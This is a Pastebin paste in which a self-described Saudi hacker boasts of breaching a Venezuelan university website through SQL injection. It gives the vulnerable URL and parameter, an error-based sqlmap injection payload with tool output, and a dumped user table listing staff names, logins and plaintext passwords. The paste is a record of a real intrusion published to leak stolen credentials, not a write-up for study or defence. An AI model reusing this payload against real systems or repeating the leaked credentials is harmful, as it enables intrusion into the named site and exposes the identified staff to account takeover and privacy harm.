Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- By @JM511
- Follow me: www.twitter.com/JM511
- We Are Saudi Arabian Hacker
- Don't Fuck With ME ;) Hackers From Venezuela ;)
- It's Cyber Warfare
- =========================
- Greeting to : All Muslims Hackers , In3ctor , Shi5-alHacker , Zombie_Hacker , Nok511 , Virus511 , ALM511 , M16
- =========================
- Video >
- اختراق جامعة في فنزويلا - Hacked una.edu.ve by JM511
- http://www.youtube.com/watch?v=DVKwFz3AIPg
- Watch that ;)
- ==========================
- http://www.una.edu.ve/index.php?page=JM511< SQL Injection
- Table: usuarios
- [9 entries]
- +---------------------------------------------------+--------------+-------+-------------------------------+------------+-------+
- | departamento | login | nivel | nombre | password | us_id |
- +---------------------------------------------------+--------------+-------+-------------------------------+------------+-------+
- | Ciberesquina | jemvb | 1 | Jesus Miguel Vasquez | 10110581 | 19 |
- | Direcci\c3\b3n de Relaciones Interinstitucionales | relaciones | 1 | relaciones | RelinsT357 | 28 |
- | Equivalencias | equiva | 1 | Equivalencias | selene | 30 |
- | CIIUNA | fcedeno | 1 | Franklyn Cede\c3\b1o | f18030966 | 42 |
- | Informacin y Relacion | relinst | 1 | Coord. Informacion y Relacion | relinstxyz | 44 |
- | Programacion | programacion | 1 | Oficina Programaci\c3\b3n | Prog456 | 47 |
- | Dir.Relaciones | jnegring | 1 | Jaretzy Negrin | 85461013 | 48 |
- | ciiuna | ymora | 1 | Yorgy Mora | ymora | 49 |
- | CIIUNA | fcedeno | 4 | fcedeno | fklyn | 50 |
- +---------------------------------------------------+--------------+-------+-------------------------------+------------+-------+
- Database: una
- [7 tables]
- +-------------+
- | contenido |
- | encuesta |
- | informacion |
- | menu |
- | propiedades |
- | submenu |
- | usuarios |
- +-------------+
- Place: GET
- Parameter: page
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: page=1' AND (SELECT 5114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,115,108,58),(SELECT (CASE WHEN (5114=5114) THEN 1 ELSE 0 END)),CHAR(58,110,116,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'grrV'='grrV
- ---
- [18:24:15] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
- web application technology: PHP 5.3.3, Apache 2.2.16
- back-end DBMS: MySQL 5.0
- [18:24:15] [INFO] fetching database names
- [18:24:23] [INFO] the SQL query used returns 2 entries
- [18:24:24] [INFO] retrieved: information_schema
- [18:24:25] [INFO] retrieved: una
- available databases [2]:
- [*] information_schema
- [*] una
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement